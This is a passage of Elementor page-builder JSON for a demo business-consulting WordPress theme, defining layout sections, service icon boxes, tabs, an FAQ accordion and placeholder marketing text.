100%;","css_responce":"color:#000;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"9c729f9","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"105","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"ceb1db5","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"18d9949","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"307ae7c","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"7e1e80a","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"b4a267f","elType":"widget","settings":{"sub":"Improve Your Business","title":"We Offer Great<br> Number of Finance Services","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#52C5B6","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"db33442","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"fb90972","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width","padding":{"unit":"px","top":"0","right":"0","bottom":"100","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"e7270d8","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f20789d","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Marketing Research","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","is_border":"yes","icon_size":{"unit":"px","size":38,"sizes":[]},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/marketing-research\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#52C5B6","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"is_line":"","bg_box":"#30344D","icon_color":"#FFFFFF","circle_color":"#FFFFFF4D","dot_color":"#52C5B6","circle_hcolor":"#FFFFFF4D","_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_color":"#FFFFFF","des_color":"#AFC1CE","link_btn_color":"#FFFFFF","box_box_shadow_box_shadow_type":"yes","box_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"dbfa939","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"7c75bea","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":649},"library":"svg"},"title":"Organizational Audit","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_border":"yes","icon_size":{"unit":"px","size":38,"sizes":[]},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#FFFFFF","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"is_line":"","bg_box":"#52C5B6","icon_color":"#30344D","circle_color":"#FFFFFF4D","dot_color":"#FFFFFF","_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_color":"#FFFFFF","des_color":"#FFFFFF","link_btn_color":"#FFFFFF","box_box_shadow_box_shadow_type":"yes","box_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"5a865ff","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"96dea76","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":1872},"library":"svg"},"title":"Business Consulting","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_border":"yes","icon_size":{"unit":"px","size":38,"sizes":[]},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#30344D","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"is_line":"","bg_box":"#F5F5F5","icon_color":"#FFFFFF","circle_color":"#1B1D2126","dot_color":"#30344D","_margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"_margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"title_color":"#1B1D21","des_color":"#5F5F5F","box_box_shadow_box_shadow_type":"yes","box_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"2e9f87b","elType":"section","settings":{"layout":"full_width"},"elements":[{"id":"eee05da","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"717808e","elType":"widget","settings":{"image_carousel":[{"_id":"46a0442","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01-1.svg","id":583},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"24adf3d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02-1.svg","id":584},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"90b7ac2","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03-1.svg","id":585},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04-1.svg","id":586},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"cb5bb18"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05-1.svg","id":587},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"e595c69"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06-1.svg","id":588},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"6fa2f0f"}],"tshow":"6","tshow_tablet":"4","dots":"false","img_spacing":{"unit":"px","size":80,"sizes":[]},"img_css_filters_hover_css_filter":"custom","img_css_filters_hover_brightness":{"unit":"px","size":0,"sizes":[]},"_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iclogos"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"f98a129","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-value.jpg","id":540},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false},"background_attachment":"fixed"},"elements":[{"id":"74d918b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"70888ff","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"73","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"102e3c2","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"fe3fcf3","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"aedcd08","elType":"widget","settings":{"sub":"the language of business","title":"Consultancy That Empowers You","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#FFFFFF","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"76334c4","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center","text_color":"#FFFFFF"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"02d61fb","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"6c8a9c3","elType":"section","settings":{"layout":"full_width"},"elements":[{"id":"9bba11e","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"1b277dd","elType":"widget","settings":{"title_boxes":[{"_id":"228c623","titles":"our philosophy","title_link":"#our-philo"},{"_id":"71b96ee","titles":"our mission","title_link":"#our-mission"},{"titles":"our vision","title_link":"#our-vision","_id":"02bca8a"}],"radius_title":{"unit":"px","top":"3","right":"3","bottom":"0","left":"0","isLinked":false},"title_bg":"#FFFFFF33","title_active_color":"#1B1D21","title_active_bg":"#FFFFFF"},"elements":[],"widgetType":"itabtitle"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"199390c","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"_element_id":"our-philo"},"elements":[{"id":"79a2f60","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"524bb26","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-value.jpg","id":542},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"ec050b8","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"c47e04f","elType":"widget","settings":{"title":"Our Philosophy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"98892de","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"2f3b9ff","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"0834177","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"65194e8","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"00c58ab","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"_element_id":"our-mission"},"elements":[{"id":"be05930","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"71b7a59","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/our-vision.jpg","id":1029},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"f4ee267","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"486dcf9","elType":"widget","settings":{"title":"Our Mission","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9df4d84","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"2fb5cbf","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"617b8da","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"5411aa3","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"9cca435","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"_element_id":"our-vision"},"elements":[{"id":"ebaf922","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"e2c3b92","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image2-home1.jpg","id":1026},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"1f874e2","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"90f9bad","elType":"widget","settings":{"title":"Our Vision","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4665cd9","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"1c72ad9","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"d2a9d51","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"0d223b8","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"4efe72c","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"95","right":"0","bottom":"130","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"95","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"background_background":"classic","background_color":"#30344D"},"elements":[{"id":"71e38ca","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"ca3cbb1","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","title_color":"#FFFFFF"},"elements":[],"widgetType":"iheading"},{"id":"21feab3","elType":"widget","settings":{"ot_accs":[{"acc_title":"In what areas do you provide management consulting?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"cab9896"},{"acc_title":"In which countries do you provide consulting services?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"d505a0a"},{"acc_title":"How is a consulting project started and organized?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"5303f19"}],"_padding":{"unit":"px","top":"0","right":"50","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"bg_title":"#A7A7A733","title_border":"#FFFFFF4D","title_color":"#FFFFFF","content_color":"#CCCCCC"},"elements":[],"widgetType":"iaccordions"}],"isInner":false},{"id":"2a52c98","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"d32949b","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-5.png","id":2232},"image_size":"full","align":"left","_margin":{"unit":"px","top":"0","right":"0","bottom":"-30","left":"-30","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"0895548","elType":"section","settings":{"layout":"full_width"},"elements":[{"id":"f0cc8b3","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"a129f2b","elType":"widget","settings":{"filter":"","all_text":"All","column":"pf_4_cols","project_num":4,"load_more":"","loading_more":"Loading...","_padding":{"unit":"px","top":"30","right":"30","bottom":"0","left":"30","isLinked":false},"overlay_align":"left","position":"flex-end","overlay_background":"#22232899","show_icon":""},"elements":[],"widgetType":"ipfilter"}],"isInner":false}],"isInner":false},{"id":"2d89947","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"8ddda56","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6e4fb79","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"795f1d3","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"e5ab65e","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"9d04040","elType":"widget","settings":{"sub":"Digital solutions","title":"Our Services","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"562f591","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"19f90ec","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"e49366c","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"8b6be4e","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"4e1240a","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Marketing Research","des":"We are working in the format of an outsourcing project office. ","is_line":"yes","line_color":"#E5E5E5","hiver_line_color":"#52C5B6","icon_color":"#FFFFFF","icon_bg":"#52C5B6","icon_space":{"unit":"px","size":100,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"radius_box":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"500","_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"79746ed","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"301dfea","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":649},"library":"svg"},"title":"\u041erganizational Audit","des":"We are working in the format of an outsourcing project office. ","is_line":"yes","line_color":"#E5E5E5","hiver_line_color":"#52C5B6","icon_color":"#FFFFFF","icon_bg":"#52C5B6","icon_space":{"unit":"px","size":100,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"radius_box":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"500"},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"c3ac582","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"7458621","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":1872},"library":"svg"},"title":"Business Consulting","des":"We are working in the format of an outsourcing project office. 